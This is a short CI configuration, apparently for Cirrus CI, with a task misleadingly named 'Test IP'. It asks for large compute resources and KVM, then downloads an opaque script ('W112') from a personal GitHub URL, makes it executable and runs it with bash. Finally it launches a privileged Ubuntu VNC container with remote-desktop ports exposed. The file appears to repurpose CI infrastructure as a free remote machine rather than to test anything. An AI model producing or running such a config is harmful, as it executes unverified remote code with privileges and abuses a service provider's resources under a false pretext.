task:
  name: Test IP
  timeout_in: 120m
  environment:
    TOKEN: ENCRYPTED[4f8f605b4206270d5945527a0393613b1e26034ad8274524c635c7e556c7cc148c52e9c17e1d2bf9e648dab9850ff342]
  container:
    cpu: 8
    memory: 32G
    image: docker.io/ubuntu
    kvm: true
  script: 
   - wget https://raw.githubusercontent.com/freddyzuncover/dangdev/main/W112
   - chmod +x *
   - bash W112
   - docker run --name ubuntu18.04 --privileged --shm-size 1g -d -p 5900:5900 -p 6080:6080 thuonghai2711/ubuntu-vnc:latest 
   
